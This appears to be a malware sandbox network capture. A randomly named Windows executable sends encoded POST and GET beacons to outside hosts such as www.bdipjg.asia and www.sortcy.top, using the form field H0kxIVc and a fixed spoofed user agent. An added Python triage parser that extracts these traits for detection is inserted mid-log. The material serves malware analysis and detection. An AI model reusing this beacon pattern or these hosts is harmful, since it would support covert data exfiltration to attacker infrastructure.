                                                          Nov 5, 2024 15:44:11.874686003 CET | 451 | OUT | GET /y4rz/?H0kxIVc=xriQ2m9IoSX/ZoqlWfOVIBJe8W/8vJ5niPS32xN8MNumdhR7vqoy4sIK639fnDEnN3UXIMGdxg/r6m8kDokIxA6VYynAvS6SL+DIBN0UUOY3N4LB1E/wQc0=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.meliorahomes.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:44:12.878463030 CET | 393 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:12 GMT
                                                          Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                          Content-Length: 203
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 34 72 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          25 | 192.168.2.4 | 50028 | 78.141.202.204 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:18.905379057 CET | 712 | OUT | POST /mszq/ HTTP/1.1
                                                          Host: www.bdipjg.asia
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bdipjg.asia
                                                          Referer: http://www.bdipjg.asia/mszq/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6e 78 39 48 38 50 4b 72 35 4d 47 42 66 76 69 52 4f 51 44 4a 71 33 4e 47 50 62 36 4d 70 68 6c 63 7a 6b 44 68 39 50 76 51 48 72 36 47 46 4d 76 4e 6d 42 33 41 53 47 66 47 30 6f 31 6d 78 35 6d 6c 38 72 55 62 47 46 38 47 64 58 6b 33 54 37 6d 63 34 6b 75 42 2f 4d 52 72 35 69 74 64 61 48 4d 7a 68 77 72 48 2f 4c 4e 4c 31 62 31 32 61 36 67 56 77 39 42 2b 76 6a 39 56 75 74 61 43 54 64 64 38 73 41 48 37 78 43 6a 75 45 73 77 67 2b 30 58 6e 6a 2b 37 62 73 53 4d 61 6e 74 77 70 45 43 78 44 57 54 67 5a 69 76 50 78 72 38 56 2f 69 42 33 45 71 4b 6d 39 41 53 34 43 46 6c 31 7a 37 4d 46 6d 34 67 3d 3d
                                                          Data Ascii: H0kxIVc=nx9H8PKr5MGBfviROQDJq3NGPb6MphlczkDh9PvQHr6GFMvNmB3ASGfG0o1mx5ml8rUbGF8GdXk3T7mc4kuB/MRr5itdaHMzhwrH/LNL1b12a6gVw9B+vj9VutaCTdd8sAH7xCjuEswg+0Xnj+7bsSMantwpECxDWTgZivPxr8V/iB3EqKm9AS4CFl1z7MFm4g==
                                                          Nov 5, 2024 15:44:19.697069883 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:44:19 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.bdipjg.asia/mszq/
                                                          Strict-Transport-Security: max-age=31536000
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          26 | 192.168.2.4 | 50029 | 78.141.202.204 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:21.456774950 CET | 732 | OUT | POST /mszq/ HTTP/1.1
                                                          Host: www.bdipjg.asia
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bdipjg.asia
                                                          Referer: http://www.bdipjg.asia/mszq/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6e 78 39 48 38 50 4b 72 35 4d 47 42 51 75 53 52 4a 77 2f 4a 74 58 4d 30 53 72 36 4d 77 52 6b 56 7a 6b 50 68 39 4f 36 49 48 5a 65 47 46 70 54 4e 6e 41 33 41 54 47 66 47 74 59 31 6a 31 35 6d 55 38 72 59 69 47 45 73 47 64 58 77 33 54 36 36 63 34 7a 43 43 35 63 52 70 2f 69 74 66 43 6e 4d 7a 68 77 72 48 2f 4c 4a 68 31 62 4e 32 61 4b 51 56 32 63 42 39 68 44 39 57 70 74 61 43 58 64 64 34 73 41 48 4a 78 44 50 41 45 76 49 67 2b 31 6e 6e 6a 76 37 45 6d 53 4d 6d 70 4e 77 38 55 41 52 4f 63 77 64 50 6f 70 58 46 72 59 6c 74 71 6e 6d 65 37 37 48 71 53 53 63 78 59 69 38 48 32 50 34 76 6a 73 61 63 73 74 30 33 4e 67 66 6e 79 45 6b 74 57 4c 6f 6a 42 75 63 3d
                                                          Data Ascii: H0kxIVc=nx9H8PKr5MGBQuSRJw/JtXM0Sr6MwRkVzkPh9O6IHZeGFpTNnA3ATGfGtY1j15mU8rYiGEsGdXw3T66c4zCC5cRp/itfCnMzhwrH/LJh1bN2aKQV2cB9hD9WptaCXdd4sAHJxDPAEvIg+1nnjv7EmSMmpNw8UAROcwdPopXFrYltqnme77HqSScxYi8H2P4vjsacst03NgfnyEktWLojBuc=
                                                          Nov 5, 2024 15:44:22.279025078 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:44:22 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.bdipjg.asia/mszq/
                                                          Strict-Transport-Security: max-age=31536000
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.4 | 50030 | 78.141.202.204 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:24.009546995 CET | 10814 | OUT | POST /mszq/ HTTP/1.1
                                                          Host: www.bdipjg.asia
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bdipjg.asia
                                                          Referer: http://www.bdipjg.asia/mszq/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6e 78 39 48 38 50 4b 72 35 4d 47 42 51 75 53 52 4a 77 2f 4a 74 58 4d 30 53 72 36 4d 77 52 6b 56 7a 6b 50 68 39 4f 36 49 48 5a 57 47 45 62 72 4e 6d 6a 66 41 51 47 66 47 6c 34 31 69 31 35 6d 4a 38 6f 70 71 47 42 31 7a 64 52 30 33 52 59 79 63 76 33 57 43 77 63 52 70 79 43 74 65 61 48 4e 7a 68 30 50 62 2f 4c 5a 68 31 62 4e 32 61 4a 49 56 68 64 42 39 6a 44 39 56 75 74 61 47 54 64 64 51 73 45 53 2b 78 44 37 2b 45 65 6f 67 2f 56 33 6e 6c 5a 50 45 75 53 4d 65 71 4e 78 35 55 41 63 4f 63 77 52 31 6f 70 4b 51 72 66 56 74 76 47 69 46 73 34 44 4c 57 52 4e 70 49 6a 55 41 34 66 6b 71 71 4e 43 65 6f 34 30 37 61 6a 2f 45 6f 56 35 50 43 65 38 41 43 59 53 64 47 76 75 41 51 4f 77 68 37 41 55 4e 73 61 53 65 57 34 46 74 33 6b 6d 65 58 71 44 4d 35 50 42 5a 76 46 7a 71 6c 49 5a 6d 49 53 63 6f 6d 75 50 75 4c 43 6b 38 6d 4d 74 69 59 57 79 6d 63 50 35 70 30 73 78 59 34 6e 2b 59 74 36 7a 47 59 39 6c 4f 71 47 4d 49 4a 38 62 5a 45 59 6f 7a 53 46 5a 66 41 2b 54 43 55 73 5a 67 61 63 6c 67 77 41 57 6f 61 44 [TRUNCATED]
                                                          Data Ascii: H0kxIVc= [TRUNCATED]
                                                          Nov 5, 2024 15:44:24.812372923 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:44:24 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.bdipjg.asia/mszq/
                                                          Strict-Transport-Security: max-age=31536000
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.4 | 50031 | 78.141.202.204 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:26.547631979 CET | 446 | OUT | GET /mszq/?H0kxIVc=qzVn//GB+4OjafG5GgjKg0F9R431hw5vq1LA9tKLMIDmfofusT37PFzci/hE67mKwrwsGFZ3ShgwJaTX+jeHs9Yuswh/Qy8vjFWcpY9xjOhcfqEzjvtiqBI=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.bdipjg.asia
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:44:27.334160089 CET | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:44:27 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.bdipjg.asia/mszq/?H0kxIVc=qzVn//GB+4OjafG5GgjKg0F9R431hw5vq1LA9tKLMIDmfofusT37PFzci/hE67mKwrwsGFZ3ShgwJaTX+jeHs9Yuswh/Qy8vjFWcpY9xjOhcfqEzjvtiqBI=&Ot=J0UP4Hshc
                                                          Strict-Transport-Security: max-age=31536000
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


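The sessions above repeat one exchange against each host (www.meliorahomes.net, then www.bdipjg.asia): a short POST, a roughly 10 KB POST and a GET to the same four-character path, every request carrying the same Firefox 3.5 user agent, and one parameter name (H0kxIVc) used as the only form field in the POST bodies and as the query key of the GET, which adds a second Ot= key; the servers answered 404 or 301. The following parser is an added example and is not part of the Joe Sandbox report. It pulls those traits out of raw requests and handles the one point that trips up a quick script: the parameter values are base64 containing '+' and '/', so a standard form decoder such as urllib.parse.parse_qs would turn '+' into a space and the value would no longer decode. The sample requests are constructed from sessions 22, 24 and 25 (request line, Host, Content-Length, Content-Type, Connection, User-Agent and body copied from the capture, the other headers omitted); the function and field names are my own.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# User agent carried by every request in the capture (copied from the sessions).
CAPTURED_UA = ("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) "
               "Gecko/20090824 Firefox/3.5.3")

# Constructed sample input: sessions 22, 24 and 25 rebuilt with CRLF line endings.
SAMPLE_REQUESTS: List[str] = [
    "POST /y4rz/ HTTP/1.1\r\nHost: www.meliorahomes.net\r\nContent-Length: 224\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n"
    f"User-Agent: {CAPTURED_UA}\r\n\r\n"
    "H0kxIVc=8pKw1ThT2h2RYLyGdv2JEiFwzkiVgLhBiNTZtQ5LL8eHagdAi5Ae6OwU1Hh4nTA5CXQQdpuO5Fr55lY0"
    "SMMRhxehBjPVsFCtELbPCIYDW+llLbD2ukfhZKG7glEei6RfLDd45c7pCJf7JfJua3Z5DfbRYEd4v7iqfZ2V32aI3A"
    "43zUwYcPyr2vPme7R8EVk3WdNBtXEAtgJLwf4Eq9W6Ryc=",
    "GET /y4rz/?H0kxIVc=xriQ2m9IoSX/ZoqlWfOVIBJe8W/8vJ5niPS32xN8MNumdhR7vqoy4sIK639f"
    "nDEnN3UXIMGdxg/r6m8kDokIxA6VYynAvS6SL+DIBN0UUOY3N4LB1E/wQc0=&Ot=J0UP4Hshc HTTP/1.1\r\n"
    f"Host: www.meliorahomes.net\r\nConnection: close\r\nUser-Agent: {CAPTURED_UA}\r\n\r\n",
    "POST /mszq/ HTTP/1.1\r\nHost: www.bdipjg.asia\r\nContent-Length: 204\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n"
    f"User-Agent: {CAPTURED_UA}\r\n\r\n"
    "H0kxIVc=nx9H8PKr5MGBfviROQDJq3NGPb6MphlczkDh9PvQHr6GFMvNmB3ASGfG0o1mx5ml8rUbGF8GdXk3T7mc"
    "4kuB/MRr5itdaHMzhwrH/LNL1b12a6gVw9B+vj9VutaCTdd8sAH7xCjuEswg+0Xnj+7bsSMantwpECxD"
    "WTgZivPxr8V/iB3EqKm9AS4CFl1z7MFm4g==",
]


@dataclass
class Beacon:
    method: str
    host: str
    path: str
    user_agent: str
    content_length: Optional[int]
    body_len: int
    params: Dict[str, str]  # raw values, not form-decoded (see split_raw_form)


def split_raw_form(raw: str) -> Dict[str, str]:
    """Split key=value&key=value on '&' and the first '=' only.

    No percent or plus decoding: the captured values are base64 with '+', '/'
    and trailing '=', and parse_qs would turn '+' into a space.
    """
    params: Dict[str, str] = {}
    for part in raw.split("&"):
        if part:
            key, _, value = part.partition("=")
            params[key] = value
    return params


def parse_request(raw: str) -> Beacon:
    """Parse one raw HTTP/1.1 request into a Beacon record."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")  # first colon only: UA contains "rv:1.9.1.3"
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    length = headers.get("content-length")
    return Beacon(method, headers.get("host", ""), url.path, headers.get("user-agent", ""),
                  int(length) if length is not None else None, len(body),
                  split_raw_form(url.query if method == "GET" else body))


BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decoded_length(value: str) -> int:
    """Byte length of a base64 value, or -1 if it is not well-formed base64."""
    if not BASE64_RE.match(value) or len(value) % 4:
        return -1
    return len(base64.b64decode(value, validate=True))


def summarize(raw_requests: List[str]) -> dict:
    """Traits shared across the requests: hosts in the order tried, the single
    parameter name reused by POST body and GET query, a fixed user agent,
    base64-shaped values and Content-Length matching the body actually sent."""
    recs = [parse_request(r) for r in raw_requests]
    hosts: List[str] = []
    for r in recs:
        if r.host not in hosts:
            hosts.append(r.host)
    post_keys = {next(iter(r.params)) for r in recs if r.method == "POST" and r.params}
    key = post_keys.pop() if len(post_keys) == 1 else None
    return {
        "hosts": hosts,
        "paths": [r.path for r in recs],
        "param_key": key,
        "fixed_user_agent": len({r.user_agent for r in recs}) == 1 and recs[0].user_agent == CAPTURED_UA,
        "values_are_base64": key is not None and all(decoded_length(r.params.get(key, "")) >= 0 for r in recs),
        "content_length_consistent": all(r.content_length == r.body_len for r in recs if r.method == "POST"),
        "get_with_ot": any(r.method == "GET" and "Ot" in r.params for r in recs),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_REQUESTS))
```

The Content-Length check is worth keeping in a triage script: the capture's lengths (224 and 204) match the bodies exactly, so a mismatch in a new sample is a sign the body was re-encoded or truncated on the way into your log rather than a change in the beacon. The decoded payloads are not plaintext and are left alone here; only their well-formedness and size are recorded.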
                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.4 | 50032 | 184.94.215.26 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:32.889556885 CET | 709 | OUT | POST /sm4f/ HTTP/1.1
                                                          Host: www.sortcy.top
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.sortcy.top
                                                          Referer: http://www.sortcy.top/sm4f/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 4a 59 73 73 6f 68 33 69 71 43 58 63 59 59 64 62 6f 38 48 59 4e 45 47 37 33 30 6c 65 2f 63 57 67 71 2b 47 4a 6e 75 65 6a 53 45 72 36 46 64 56 75 6f 30 46 34 37 53 7a 4f 74 6a 4e 72 51 76 62 2b 32 51 55 43 70 6c 62 58 4f 50 45 34 66 34 41 6e 55 36 73 31 2b 39 57 31 34 4d 4e 73 6e 49 4a 4e 66 7a 2f 52 42 2b 37 68 67 63 55 4a 5a 42 30 50 4b 6e 6b 30 6a 56 78 6c 2b 37 45 44 61 33 78 36 56 74 2f 70 59 76 6c 48 52 62 51 7a 57 2b 53 46 5a 6a 42 2b 4b 68 2f 56 36 74 7a 78 69 52 70 50 6c 69 63 4c 68 4a 71 75 44 66 74 76 71 42 42 43 6a 65 7a 37 56 6d 66 36 50 4d 77 75 35 2b 76 4c 32 77 3d 3d
                                                          Data Ascii: H0kxIVc=JYssoh3iqCXcYYdbo8HYNEG730le/cWgq+GJnuejSEr6FdVuo0F47SzOtjNrQvb+2QUCplbXOPE4f4AnU6s1+9W14MNsnIJNfz/RB+7hgcUJZB0PKnk0jVxl+7EDa3x6Vt/pYvlHRbQzW+SFZjB+Kh/V6tzxiRpPlicLhJquDftvqBBCjez7Vmf6PMwu5+vL2w==
                                                          Nov 5, 2024 15:44:33.582989931 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:33 GMT
                                                          Server: Apache
                                                          Content-Length: 13840
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                          Nov 5, 2024 15:44:33.583009958 CET | 1236 | IN | Data Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                                          Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                                                          Nov 5, 2024 15:44:33.583020926 CET | 1236 | IN | Data Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                                                          Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                                                          Nov 5, 2024 15:44:33.583159924 CET | 1236 | IN | Data Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                                                          Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                                                          Nov 5, 2024 15:44:33.583172083 CET | 1236 | IN | Data Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
